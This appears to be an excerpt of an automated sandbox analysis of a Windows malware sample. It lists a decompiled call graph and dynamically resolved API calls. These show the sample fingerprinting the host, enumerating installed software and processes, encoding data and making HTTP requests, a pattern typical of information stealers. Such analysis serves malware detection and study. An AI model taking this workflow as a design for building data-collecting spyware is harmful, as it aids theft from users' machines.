cc1a64 14923->14924 14925 cca9b0 4 API calls 14924->14925 14926 cc1a7d 14925->14926 14927 cca8a0 lstrcpy 14926->14927 14928 cc1a86 14927->14928 14929 cca9b0 4 API calls 14928->14929 14930 cc1aa1 14929->14930 14931 cca8a0 lstrcpy 14930->14931 14932 cc1aaa 14931->14932 14933 cca9b0 4 API calls 14932->14933 14934 cc1ac3 14933->14934 14935 cca8a0 lstrcpy 14934->14935 14936 cc1acc 14935->14936 14937 cca9b0 4 API calls 14936->14937 14938 cc1ae7 14937->14938 14939 cca8a0 lstrcpy 14938->14939 14940 cc1af0 14939->14940 14941 cca9b0 4 API calls 14940->14941 14942 cc1b09 14941->14942 14943 cca8a0 lstrcpy 14942->14943 14944 cc1b12 14943->14944 14945 cca9b0 4 API calls 14944->14945 14946 cc1b2d 14945->14946 14947 cca8a0 lstrcpy 14946->14947 14948 cc1b36 14947->14948 14949 cca9b0 4 API calls 14948->14949 14950 cc1b4f 14949->14950 14951 cca8a0 lstrcpy 14950->14951 14952 cc1b58 14951->14952 14953 cca9b0 4 API calls 14952->14953 14954 cc1b76 14953->14954 14955 cca8a0 lstrcpy 14954->14955 14956 cc1b7f 14955->14956 14957 cc7500 6 API calls 14956->14957 14958 cc1b96 14957->14958 14959 cca920 3 API calls 14958->14959 14960 cc1ba9 14959->14960 14961 cca8a0 lstrcpy 14960->14961 14962 cc1bb2 14961->14962 14963 cca9b0 4 API calls 14962->14963 14964 cc1bdc 14963->14964 14965 cca8a0 lstrcpy 14964->14965 14966 cc1be5 14965->14966 14967 cca9b0 4 API calls 14966->14967 14968 cc1c05 14967->14968 14969 cca8a0 lstrcpy 14968->14969 14970 cc1c0e 14969->14970 15678 cc7690 GetProcessHeap RtlAllocateHeap 14970->15678 14973 cca9b0 4 API calls 14974 cc1c2e 14973->14974 14975 cca8a0 lstrcpy 14974->14975 14976 cc1c37 14975->14976 14977 cca9b0 4 API calls 14976->14977 14978 cc1c56 14977->14978 14979 cca8a0 lstrcpy 14978->14979 14980 cc1c5f 14979->14980 14981 cca9b0 4 API calls 14980->14981 14982 cc1c80 14981->14982 14983 cca8a0 lstrcpy 14982->14983 14984 cc1c89 14983->14984 15685 cc77c0 GetCurrentProcess IsWow64Process 14984->15685 14987 cca9b0 4 API calls 14988 cc1ca9 14987->14988 14989 cca8a0 lstrcpy 14988->14989 14990 cc1cb2 14989->14990 14991 cca9b0 4 API calls 14990->14991 14992 cc1cd1 14991->14992 14993 cca8a0 lstrcpy 14992->14993 14994 cc1cda 14993->14994 14995 cca9b0 4 API calls 14994->14995 14996 cc1cfb 14995->14996 14997 cca8a0 lstrcpy 14996->14997 14998 cc1d04 14997->14998 14999 cc7850 3 API calls 14998->14999 15000 cc1d14 14999->15000 15001 cca9b0 4 API calls 15000->15001 15002 cc1d24 15001->15002 15003 cca8a0 lstrcpy 15002->15003 15004 cc1d2d 15003->15004 15005 cca9b0 4 API calls 15004->15005 15006 cc1d4c 15005->15006 15007 cca8a0 lstrcpy 15006->15007 15008 cc1d55 15007->15008 15009 cca9b0 4 API calls 15008->15009 15010 cc1d75 15009->15010 15011 cca8a0 lstrcpy 15010->15011 15012 cc1d7e 15011->15012 15013 cc78e0 3 API calls 15012->15013 15014 cc1d8e 15013->15014 15015 cca9b0 4 API calls 15014->15015 15016 cc1d9e 15015->15016 15017 cca8a0 lstrcpy 15016->15017 15018 cc1da7 15017->15018 15019 cca9b0 4 API calls 15018->15019 15020 cc1dc6 15019->15020 15021 cca8a0 lstrcpy 15020->15021 15022 cc1dcf 15021->15022 15023 cca9b0 4 API calls 15022->15023 15024 cc1df0 15023->15024 15025 cca8a0 lstrcpy 15024->15025 15026 cc1df9 15025->15026 15687 cc7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15026->15687 15029 cca9b0 4 API calls 15030 cc1e19 15029->15030 15031 cca8a0 lstrcpy 15030->15031 15032 cc1e22 15031->15032 15033 cca9b0 4 API calls 15032->15033 15034 cc1e41 15033->15034 15035 cca8a0 lstrcpy 15034->15035 15036 cc1e4a 15035->15036 15037 cca9b0 4 API calls 15036->15037 15038 cc1e6b 15037->15038 15039 cca8a0 lstrcpy 15038->15039 15040 cc1e74 15039->15040 15689 cc7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15040->15689 15043 cca9b0 4 API calls 15044 cc1e94 15043->15044 15045 cca8a0 lstrcpy 15044->15045 15046 cc1e9d 15045->15046 15047 cca9b0 4 API calls 15046->15047 15048 cc1ebc 15047->15048 15049 cca8a0 lstrcpy 15048->15049 15050 cc1ec5 15049->15050 15051 cca9b0 4 API calls 15050->15051 15052 cc1ee5 15051->15052 15053 cca8a0 lstrcpy 15052->15053 15054 cc1eee 15053->15054 15692 cc7b00 GetUserDefaultLocaleName 15054->15692 15057 cca9b0 4 API calls 15058 cc1f0e 15057->15058 15059 cca8a0 lstrcpy 15058->15059 15060 cc1f17 15059->15060 15061 cca9b0 4 API calls 15060->15061 15062 cc1f36 15061->15062 15063 cca8a0 lstrcpy 15062->15063 15064 cc1f3f 15063->15064 15065 cca9b0 4 API calls 15064->15065 15066 cc1f60 15065->15066 15067 cca8a0 lstrcpy 15066->15067 15068 cc1f69 15067->15068 15696 cc7b90 15068->15696 15070 cc1f80 15071 cca920 3 API calls 15070->15071 15072 cc1f93 15071->15072 15073 cca8a0 lstrcpy 15072->15073 15074 cc1f9c 15073->15074 15075 cca9b0 4 API calls 15074->15075 15076 cc1fc6 15075->15076 15077 cca8a0 lstrcpy 15076->15077 15078 cc1fcf 15077->15078 15079 cca9b0 4 API calls 15078->15079 15080 cc1fef 15079->15080 15081 cca8a0 lstrcpy 15080->15081 15082 cc1ff8 15081->15082 15708 cc7d80 GetSystemPowerStatus 15082->15708 15085 cca9b0 4 API calls 15086 cc2018 15085->15086 15087 cca8a0 lstrcpy 15086->15087 15088 cc2021 15087->15088 15089 cca9b0 4 API calls 15088->15089 15090 cc2040 15089->15090 15091 cca8a0 lstrcpy 15090->15091 15092 cc2049 15091->15092 15093 cca9b0 4 API calls 15092->15093 15094 cc206a 15093->15094 15095 cca8a0 lstrcpy 15094->15095 15096 cc2073 15095->15096 15097 cc207e GetCurrentProcessId 15096->15097 15710 cc9470 OpenProcess 15097->15710 15100 cca920 3 API calls 15101 cc20a4 15100->15101 15102 cca8a0 lstrcpy 15101->15102 15103 cc20ad 15102->15103 15104 cca9b0 4 API calls 15103->15104 15105 cc20d7 15104->15105 15106 cca8a0 lstrcpy 15105->15106 15107 cc20e0 15106->15107 15108 cca9b0 4 API calls 15107->15108 15109 cc2100 15108->15109 15110 cca8a0 lstrcpy 15109->15110 15111 cc2109 15110->15111 15715 cc7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15111->15715 15114 cca9b0 4 API calls 15115 cc2129 15114->15115 15116 cca8a0 lstrcpy 15115->15116 15117 cc2132 15116->15117 15118 cca9b0 4 API calls 15117->15118 15119 cc2151 15118->15119 15120 cca8a0 lstrcpy 15119->15120 15121 cc215a 15120->15121 15122 cca9b0 4 API calls 15121->15122 15123 cc217b 15122->15123 15124 cca8a0 lstrcpy 15123->15124 15125 cc2184 15124->15125 15719 cc7f60 15125->15719 15128 cca9b0 4 API calls 15129 cc21a4 15128->15129 15130 cca8a0 lstrcpy 15129->15130 15131 cc21ad 15130->15131 15132 cca9b0 4 API calls 15131->15132 15133 cc21cc 15132->15133 15134 cca8a0 lstrcpy 15133->15134 15135 cc21d5 15134->15135 15136 cca9b0 4 API calls 15135->15136 15137 cc21f6 15136->15137 15138 cca8a0 lstrcpy 15137->15138 15139 cc21ff 15138->15139 15732 cc7ed0 GetSystemInfo wsprintfA 15139->15732 15142 cca9b0 4 API calls 15143 cc221f 15142->15143 15144 cca8a0 lstrcpy 15143->15144 15145 cc2228 15144->15145 15146 cca9b0 4 API calls 15145->15146 15147 cc2247 15146->15147 15148 cca8a0 lstrcpy 15147->15148 15149 cc2250 15148->15149 15150 cca9b0 4 API calls 15149->15150 15151 cc2270 15150->15151 15152 cca8a0 lstrcpy 15151->15152 15153 cc2279 15152->15153 15734 cc8100 GetProcessHeap RtlAllocateHeap 15153->15734 15156 cca9b0 4 API calls 15157 cc2299 15156->15157 15158 cca8a0 lstrcpy 15157->15158 15159 cc22a2 15158->15159 15160 cca9b0 4 API calls 15159->15160 15161 cc22c1 15160->15161 15162 cca8a0 lstrcpy 15161->15162 15163 cc22ca 15162->15163 15164 cca9b0 4 API calls 15163->15164 15165 cc22eb 15164->15165 15166 cca8a0 lstrcpy 15165->15166 15167 cc22f4 15166->15167 15740 cc87c0 15167->15740 15170 cca920 3 API calls 15171 cc231e 15170->15171 15172 cca8a0 lstrcpy 15171->15172 15173 cc2327 15172->15173 15174 cca9b0 4 API calls 15173->15174 15175 cc2351 15174->15175 15176 cca8a0 lstrcpy 15175->15176 15177 cc235a 15176->15177 15178 cca9b0 4 API calls 15177->15178 15179 cc237a 15178->15179 15180 cca8a0 lstrcpy 15179->15180 15181 cc2383 15180->15181 15182 cca9b0 4 API calls 15181->15182 15183 cc23a2 15182->15183 15184 cca8a0 lstrcpy 15183->15184 15185 cc23ab 15184->15185 15745 cc81f0 15185->15745 15187 cc23c2 15188 cca920 3 API calls 15187->15188 15189 cc23d5 15188->15189 15190 cca8a0 lstrcpy 15189->15190 15191 cc23de 15190->15191 15192 cca9b0 4 API calls 15191->15192 15193 cc240a 15192->15193 15194 cca8a0 lstrcpy 15193->15194 15195 cc2413 15194->15195 15196 cca9b0 4 API calls 15195->15196 15197 cc2432 15196->15197 15198 cca8a0 lstrcpy 15197->15198 15199 cc243b 15198->15199 15200 cca9b0 4 API calls 15199->15200 15201 cc245c 15200->15201 15202 cca8a0 lstrcpy 15201->15202 15203 cc2465 15202->15203 15204 cca9b0 4 API calls 15203->15204 15205 cc2484 15204->15205 15206 cca8a0 lstrcpy 15205->15206 15207 cc248d 15206->15207 15208 cca9b0 4 API calls 15207->15208 15209 cc24ae 15208->15209 15210 cca8a0 lstrcpy 15209->15210 15211 cc24b7 15210->15211 15753 cc8320 15211->15753 15213 cc24d3 15214 cca920 3 API calls 15213->15214 15215 cc24e6 15214->15215 15216 cca8a0 lstrcpy 15215->15216 15217 cc24ef 15216->15217 15218 cca9b0 4 API calls 15217->15218 15219 cc2519 15218->15219 15220 cca8a0 lstrcpy 15219->15220 15221 cc2522 15220->15221 15222 cca9b0 4 API calls 15221->15222 15223 cc2543 15222->15223 15224 cca8a0 lstrcpy 15223->15224 15225 cc254c 15224->15225 15226 cc8320 17 API calls 15225->15226 15227 cc2568 15226->15227 15228 cca920 3 API calls 15227->15228 15229 cc257b 15228->15229 15230 cca8a0 lstrcpy 15229->15230 15231 cc2584 15230->15231 15232 cca9b0 4 API calls 15231->15232 15233 cc25ae 15232->15233 15234 cca8a0 lstrcpy 15233->15234 15235 cc25b7 15234->15235 15236 cca9b0 4 API calls 15235->15236 15237 cc25d6 15236->15237 15238 cca8a0 lstrcpy 15237->15238 15239 cc25df 15238->15239 15240 cca9b0 4 API calls 15239->15240 15241 cc2600 15240->15241 15242 cca8a0 lstrcpy 15241->15242 15243 cc2609 15242->15243 15789 cc8680 15243->15789 15245 cc2620 15246 cca920 3 API calls 15245->15246 15247 cc2633 15246->15247 15248 cca8a0 lstrcpy 15247->15248 15249 cc263c 15248->15249 15250 cc265a lstrlen 15249->15250 15251 cc266a 15250->15251 15252 cca740 lstrcpy 15251->15252 15253 cc267c 15252->15253 15254 cb1590 lstrcpy 15253->15254 15255 cc268d 15254->15255 15799 cc5190 15255->15799 15257 cc2699 15257->13689 15987 ccaad0 15258->15987 15260 cb5009 InternetOpenUrlA 15263 cb5021 15260->15263 15261 cb502a InternetReadFile 15261->15263 15262 cb50a0 InternetCloseHandle InternetCloseHandle 15264 cb50ec 15262->15264 15263->15261 15263->15262 15264->13693 15988 cb98d0 15265->15988 15267 cc0759 15268 cc077d 15267->15268 15269 cc0a38 15267->15269 15272 cc0799 StrCmpCA 15268->15272 15270 cb1590 lstrcpy 15269->15270 15271 cc0a49 15270->15271 16164 cc0250 15271->16164 15274 cc07a8 15272->15274 15299 cc0843 15272->15299 15276 cca7a0 lstrcpy 15274->15276 15278 cc07c3 15276->15278 15277 cc0865 StrCmpCA 15279 cc0874 15277->15279 15317 cc096b 15277->15317 15280 cb1590 lstrcpy 15278->15280 15281 cca740 lstrcpy 15279->15281 15282 cc080c 15280->15282 15285 cc0881 15281->15285 15283 cca7a0 lstrcpy 15282->15283 15286 cc0823 15283->15286 15284 cc099c StrCmpCA 15287 cc09ab 15284->15287 15306 cc0a2d 15284->15306 15288 cca9b0 4 API calls 15285->15288 15289 cca7a0 lstrcpy 15286->15289 15290 cb1590 lstrcpy 15287->15290 15291 cc08ac 15288->15291 15292 cc083e 15289->15292 15293 cc09f4 15290->15293 15294 cca920 3 API calls 15291->15294 15991 cbfb00 15292->15991 15296 cca7a0 lstrcpy 15293->15296 15297 cc08b3 15294->15297 15300 cc0a0d 15296->15300 15298 cca9b0 4 API calls 15297->15298 15301 cc08ba 15298->15301 15299->15277 15302 cca7a0 lstrcpy 15300->15302 15304 cca8a0 lstrcpy 15301->15304 15303 cc0a28 15302->15303 16107 cc0030 15303->16107 15306->13697 15317->15284 15639 cca7a0 lstrcpy 15638->15639 15640 cb1683 15639->15640 15641 cca7a0 lstrcpy 15640->15641 15642 cb1695 15641->15642 15643 cca7a0 lstrcpy 15642->15643 15644 cb16a7 15643->15644 15645 cca7a0 lstrcpy 15644->15645 15646 cb15a3 15645->15646 15646->14520 15648 cb47c6 15647->15648 15649 cb4838 lstrlen 15648->15649 15673 ccaad0 15649->15673 15651 cb4848 InternetCrackUrlA 15652 cb4867 15651->15652 15652->14597 15654 cca740 lstrcpy 15653->15654 15655 cc8b74 15654->15655 15656 cca740 lstrcpy 15655->15656 15657 cc8b82 GetSystemTime 15656->15657 15658 cc8b99 15657->15658 15659 cca7a0 lstrcpy 15658->15659 15660 cc8bfc 15659->15660 15660->14612 15662 cca931 15661->15662 15663 cca988 15662->15663 15665 cca968 lstrcpy lstrcat 15662->15665 15664 cca7a0 lstrcpy 15663->15664 15666 cca994 15664->15666 15665->15663 15666->14616 15667->14730 15669 cb4eee 15668->15669 15670 cb9af9 LocalAlloc 15668->15670 15669->14618 15669->14621 15670->15669 15671 cb9b14 CryptStringToBinaryA 15670->15671 15671->15669 15672 cb9b39 LocalFree 15671->15672 15672->15669 15673->15651 15674->14740 15675->14881 15676->14883 15677->14891 15806 cc77a0 15678->15806 15681 cc1c1e 15681->14973 15682 cc76c6 RegOpenKeyExA 15683 cc7704 RegCloseKey 15682->15683 15684 cc76e7 RegQueryValueExA 15682->15684 15683->15681 15684->15683 15686 cc1c99 15685->15686 15686->14987 15688 cc1e09 15687->15688 15688->15029 15690 cc7a9a wsprintfA 15689->15690 15691 cc1e84 15689->15691 15690->15691 15691->15043 15693 cc7b4d 15692->15693 15694 cc1efe 15692->15694 15813 cc8d20 LocalAlloc CharToOemW 15693->15813 15694->15057 15697 cca740 lstrcpy 15696->15697 15698 cc7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15697->15698 15707 cc7c25 15698->15707 15699 cc7d18 15701 cc7d1e LocalFree 15699->15701 15702 cc7d28 15699->15702 15700 cc7c46 GetLocaleInfoA 15700->15707 15701->15702 15703 cca7a0 lstrcpy 15702->15703 15706 cc7d37 15703->15706 15704 cca8a0 lstrcpy 15704->15707 15705 cca9b0 lstrcpy lstrlen lstrcpy lstrcat 15705->15707 15706->15070 15707->15699 15707->15700 15707->15704 15707->15705 15709 cc2008 15708->15709 15709->15085 15711 cc94b5 15710->15711 15712 cc9493 GetModuleFileNameExA CloseHandle 15710->15712 15713 cca740 lstrcpy 15711->15713 15712->15711 15714 cc2091 15713->15714 15714->15100 15716 cc7e68 RegQueryValueExA 15715->15716 15717 cc2119 15715->15717 15718 cc7e8e RegCloseKey 15716->15718 15717->15114 15718->15717 15720 cc7fb9 GetLogicalProcessorInformationEx 15719->15720 15721 cc7fd8 GetLastError 15720->15721 15724 cc8029 15720->15724 15730 cc8022 15721->15730 15731 cc7fe3 15721->15731 15725 cc89f0 2 API calls 15724->15725 15728 cc807b 15725->15728 15726 cc89f0 2 API calls 15727 cc2194 15726->15727 15727->15128 15729 cc8084 wsprintfA 15728->15729 15728->15730 15729->15727 15730->15726 15730->15727 15731->15720 15731->15727 15814 cc89f0 15731->15814 15817 cc8a10 GetProcessHeap RtlAllocateHeap 15731->15817 15733 cc220f 15732->15733 15733->15142 15735 cc89b0 15734->15735 15736 cc814d GlobalMemoryStatusEx 15735->15736 15737 cc8163 __aulldiv 15736->15737 15738 cc819b wsprintfA 15737->15738 15739 cc2289 15738->15739 15739->15156 15741 cc87fb GetProcessHeap RtlAllocateHeap wsprintfA 15740->15741 15743 cca740 lstrcpy 15741->15743 15744 cc230b 15743->15744 15744->15170 15746 cca740 lstrcpy 15745->15746 15750 cc8229 15746->15750 15747 cc8263 15749 cca7a0 lstrcpy 15747->15749 15748 cca9b0 lstrcpy lstrlen lstrcpy lstrcat 15748->15750 15751 cc82dc 15749->15751 15750->15747 15750->15748 15752 cca8a0 lstrcpy 15750->15752 15751->15187 15752->15750 15754 cca740 lstrcpy 15753->15754 15755 cc835c RegOpenKeyExA 15754->15755 15756 cc83ae 15755->15756 15757 cc83d0 15755->15757 15758 cca7a0 lstrcpy 15756->15758 15759 cc83f8 RegEnumKeyExA 15757->15759 15760 cc8613 RegCloseKey 15757->15760 15769 cc83bd 15758->15769 15761 cc860e 15759->15761 15762 cc843f wsprintfA RegOpenKeyExA 15759->15762 15763 cca7a0 lstrcpy 15760->15763 15761->15760 15764 cc8485 RegCloseKey RegCloseKey 15762->15764 15765 cc84c1 RegQueryValueExA 15762->15765 15763->15769 15766 cca7a0 lstrcpy 15764->15766 15767 cc84fa lstrlen 15765->15767 15768 cc8601 RegCloseKey 15765->15768 15766->15769 15767->15768 15770 cc8510 15767->15770 15768->15761 15769->15213 15771 cca9b0 4 API calls 15770->15771 15772 cc8527 15771->15772 15773 cca8a0 lstrcpy 15772->15773 15774 cc8533 15773->15774 15775 cca9b0 4 API calls 15774->15775 15776 cc8557 15775->15776 15777 cca8a0 lstrcpy 15776->15777 15778 cc8563 15777->15778 15779 cc856e RegQueryValueExA 15778->15779 15779->15768 15780 cc85a3 15779->15780 15781 cca9b0 4 API calls 15780->15781 15782 cc85ba 15781->15782 15783 cca8a0 lstrcpy 15782->15783 15784 cc85c6 15783->15784 15785 cca9b0 4 API calls 15784->15785 15786 cc85ea 15785->15786 15787 cca8a0 lstrcpy 15786->15787 15788 cc85f6 15787->15788 15788->15768 15790 cca740 lstrcpy 15789->15790 15791 cc86bc CreateToolhelp32Snapshot Process32First 15790->15791 15792 cc875d CloseHandle 15791->15792 15793 cc86e8 Process32Next 15791->15793 15794 cca7a0 lstrcpy 15792->15794 15793->15792 15798 cc86fd 15793->15798 15797 cc8776 15794->15797 15795 cca9b0 lstrcpy lstrlen lstrcpy lstrcat 15795->15798 15796 cca8a0 lstrcpy 15796->15798 15797->15245 15798->15793 15798->15795 15798->15796 15800 cca7a0 lstrcpy 15799->15800 15801 cc51b5 15800->15801 15802 cb1590 lstrcpy 15801->15802 15803 cc51c6 15802->15803 15818 cb5100 15803->15818 15805 cc51cf 15805->15257 15809 cc7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15806->15809 15808 cc76b9 15808->15681 15808->15682 15810 cc7765 RegQueryValueExA 15809->15810 15811 cc7780 RegCloseKey 15809->15811 15810->15811 15812 cc7793 15811->15812 15812->15808 15813->15694 15815 cc8a0c 15814->15815 15816 cc89f9 GetProcessHeap HeapFree 15814->15816 15815->15731 15816->15815 15817->15731 15819 cca7a0 lstrcpy 15818->15819 15820 cb5119 15819->15820 15821 cb47b0 2 API calls 15820->15821 15822 cb5125 15821->15822 15978 cc8ea0 15822->15978 15824 cb5184 15825 cb5192 lstrlen 15824->15825 15826 cb51a5 15825->15826 15827 cc8ea0 4 API calls 15826->15827 15828 cb51b6 15827->15828 15829 cca740 lstrcpy 15828->15829 15830 cb51c9 15829->15830 15831 cca740 lstrcpy 15830->15831 15832 cb51d6 15831->15832 15833 cca740 lstrcpy 15832->15833 15834 cb51e3 15833->15834 15835 cca740 lstrcpy 15834->15835 15836 cb51f0 15835->15836 15837 cca740 lstrcpy 15836->15837 15838 cb51fd InternetOpenA StrCmpCA 15837->15838 15839 cb522f 15838->15839 15840 cb58c4 InternetCloseHandle 15839->15840 15841 cc8b60 3 API calls 15839->15841 15847 cb58d9 ctype 15840->15847 15842 cb524e 15841->15842 15843 cca920 3 API calls 15842->15843 15844 cb5261 15843->15844 15845 cca8a0 lstrcpy 15844->15845 15846 cb526a 15845->15846 15848 cca9b0 4 API calls 15846->15848 15850 cca7a0 lstrcpy 15847->15850 15849 cb52ab 15848->15849 15851 cca920 3 API calls 15849->15851 15859 cb5913 15850->15859 15852 cb52b2 15851->15852 15853 cca9b0 4 API calls 15852->15853 15854 cb52b9 15853->15854 15855 cca8a0 lstrcpy 15854->15855 15856 cb52c2 15855->15856 15857 cca9b0 4 API calls 15856->15857 15858 cb5303 15857->15858 15860 cca920 3 API calls 15858->15860 15859->15805 15861 cb530a 15860->15861 15862 cca8a0 lstrcpy 15861->15862 15863 cb5313 15862->15863 15864 cb5329 InternetConnectA 15863->15864 15864->15840 15865 cb5359 HttpOpenRequestA 15864->15865 15867 cb58b7 InternetCloseHandle 15865->15867 15868 cb53b7 15865->15868 15867->15840 15869 cca9b0 4 API calls 15868->15869 15870 cb53cb 15869->15870 15871 cca8a0 lstrcpy 15870->15871 15872 cb53d4 15871->15872 15873 cca920 3 API calls 15872->15873 15874 cb53f2 15873->15874 15875 cca8a0 lstrcpy 15874->15875 15876 cb53fb 15875->15876 15877 cca9b0 4 API calls 15876->15877 15878 cb541a 15877->15878 15879 cca8a0 lstrcpy 15878->15879 15880 cb5423 15879->15880 15881 cca9b0 4 API calls 15880->15881 15882 cb5444 15881->15882 15883 cca8a0 lstrcpy 15882->15883 15884 cb544d 15883->15884 15885 cca9b0 4 API calls 15884->15885 15886 cb546e 15885->15886 15887 cca8a0 lstrcpy 15886->15887 15979 cc8ead CryptBinaryToStringA 15978->15979 15980 cc8ea9 15978->15980 15979->15980 15981 cc8ece GetProcessHeap RtlAllocateHeap 15979->15981 15980->15824 15981->15980 15982 cc8ef4 ctype 15981->15982 15983 cc8f05 CryptBinaryToStringA 15982->15983 15983->15980 15987->15260 16230 cb9880 15988->16230 15990 cb98e1 15990->15267 15992 cca740 lstrcpy 15991->15992 15993 cbfb16 15992->15993 16165 cca740 lstrcpy 16164->16165 16166 cc0266 16165->16166 16167 cc8de0 2 API calls 16166->16167 16168 cc027b 16167->16168 16169 cca920 3 API calls 16168->16169 16170 cc028b 16169->16170 16171 cca8a0 lstrcpy 16170->16171 16172 cc0294 16171->16172 16173 cca9b0 4 API calls 16172->16173 16174 cc02b8 16173->16174 16231 cb988d 16230->16231 16234 cb6fb0 16231->16234 16233 cb98ad ctype 16233->15990 16237 cb6d40 16234->16237 16238 cb6d63 16237->16238 16249 cb6d59 16237->16249 16238->16249 16251 cb6660 16238->16251 16240 cb6dbe 16240->16249 16257 cb69b0 16240->16257 16242 cb6e2a 16243 cb6ee6 VirtualFree 16242->16243 16244 cb6ef7 16242->16244 16242->16249 16243->16244 16245 cb6f38 16244->16245 16246 cb6f26 FreeLibrary 16244->16246 16250 cb6f41 16244->16250 16248 cc89f0 2 API calls 16245->16248 16246->16244 16247 cc89f0 2 API calls 16247->16249 16248->16250 16249->16233 16250->16247 16250->16249 16254 cb668f VirtualAlloc 16251->16254 16253 cb6730 16255 cb673c 16253->16255 16256 cb6743 VirtualAlloc 16253->16256 16254->16253 16254->16255 16255->16240 16256->16255 16258 cb69c9 16257->16258 16261 cb69d5 16257->16261 16259 cb6a09 LoadLibraryA 16258->16259 16258->16261 16260 cb6a32 16259->16260 16259->16261 16264 cb6ae0 16260->16264 16267 cc8a10 GetProcessHeap RtlAllocateHeap 16260->16267 16261->16242 16263 cb6ba8 GetProcAddress 16263->16261 16263->16264 16264->16261 16264->16263 16265 cc89f0 2 API calls 16265->16264 16266 cb6a8b 16266->16261 16266->16265 16267->16266

                          Executed Functions

                          Function 00CC9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 660 cc9860-cc9874 call cc9750 663 cc987a-cc9a8e call cc9780 GetProcAddress * 21 660->663 664 cc9a93-cc9af2 LoadLibraryA * 5 660->664 663->664 666 cc9b0d-cc9b14 664->666 667 cc9af4-cc9b08 GetProcAddress 664->667 668 cc9b46-cc9b4d 666->668 669 cc9b16-cc9b41 GetProcAddress * 2 666->669 667->666 671 cc9b4f-cc9b63 GetProcAddress 668->671 672 cc9b68-cc9b6f 668->672 669->668 671->672 673 cc9b89-cc9b90 672->673 674 cc9b71-cc9b84 GetProcAddress 672->674 675 cc9bc1-cc9bc2 673->675 676 cc9b92-cc9bbc GetProcAddress * 2 673->676 674->673 676->675
                          APIs
                          • GetProcAddress.KERNEL32(74DD0000,01892200), ref: 00CC98A1
                          • GetProcAddress.KERNEL32(74DD0000,01892380), ref: 00CC98BA
                          • GetProcAddress.KERNEL32(74DD0000,01892098), ref: 00CC98D2
                          • GetProcAddress.KERNEL32(74DD0000,01892188), ref: 00CC98EA
                          • GetProcAddress.KERNEL32(74DD0000,01892218), ref: 00CC9903
                          • GetProcAddress.KERNEL32(74DD0000,018999C0), ref: 00CC991B
                          • GetProcAddress.KERNEL32(74DD0000,018853F0), ref: 00CC9933
                          • GetProcAddress.KERNEL32(74DD0000,018852B0), ref: 00CC994C
                          • GetProcAddress.KERNEL32(74DD0000,018922F0), ref: 00CC9964
                          • GetProcAddress.KERNEL32(74DD0000,01892308), ref: 00CC997C
                          • GetProcAddress.KERNEL32(74DD0000,01892158), ref: 00CC9995
                          • GetProcAddress.KERNEL32(74DD0000,01892320), ref: 00CC99AD
                          • GetProcAddress.KERNEL32(74DD0000,018855B0), ref: 00CC99C5
                          • GetProcAddress.KERNEL32(74DD0000,01892230), ref: 00CC99DE
                          • GetProcAddress.KERNEL32(74DD0000,01892338), ref: 00CC99F6
                          • GetProcAddress.KERNEL32(74DD0000,018854B0), ref: 00CC9A0E
                          • GetProcAddress.KERNEL32(74DD0000,018920B0), ref: 00CC9A27
                          • GetProcAddress.KERNEL32(74DD0000,018920C8), ref: 00CC9A3F
                          • GetProcAddress.KERNEL32(74DD0000,01885390), ref: 00CC9A57
                          • GetProcAddress.KERNEL32(74DD0000,018920E0), ref: 00CC9A70
                          • GetProcAddress.KERNEL32(74DD0000,018854F0), ref: 00CC9A88
                          • LoadLibraryA.KERNEL32(01892398,?,00CC6A00), ref: 00CC9A9A
                          • LoadLibraryA.KERNEL32(018923B0,?,00CC6A00), ref: 00CC9AAB
                          • LoadLibraryA.KERNEL32(018923F8,?,00CC6A00), ref: 00CC9ABD
                          • LoadLibraryA.KERNEL32(01892428,?,00CC6A00), ref: 00CC9ACF
                          • LoadLibraryA.KERNEL32(018923C8,?,00CC6A00), ref: 00CC9AE0
                          • GetProcAddress.KERNEL32(75A70000,01892440), ref: 00CC9B02
                          • GetProcAddress.KERNEL32(75290000,01892410), ref: 00CC9B23
                          • GetProcAddress.KERNEL32(75290000,01892458), ref: 00CC9B3B
                          • GetProcAddress.KERNEL32(75BD0000,018923E0), ref: 00CC9B5D
                          • GetProcAddress.KERNEL32(75450000,018853B0), ref: 00CC9B7E
                          • GetProcAddress.KERNEL32(76E90000,01899B60), ref: 00CC9B9F
                          • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00CC9BB6
                          Strings
                          • NtQueryInformationProcess, xrefs: 00CC9BAA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1705043381.0000000000CB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                          • Associated: 00000000.00000002.1705017760.0000000000CB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000D92000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705043381.0000000000EFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000000F0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001098000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000116D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.0000000001196000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705397721.00000000011A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705844607.00000000011A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705970440.000000000133D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1705986549.000000000133E000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_cb0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
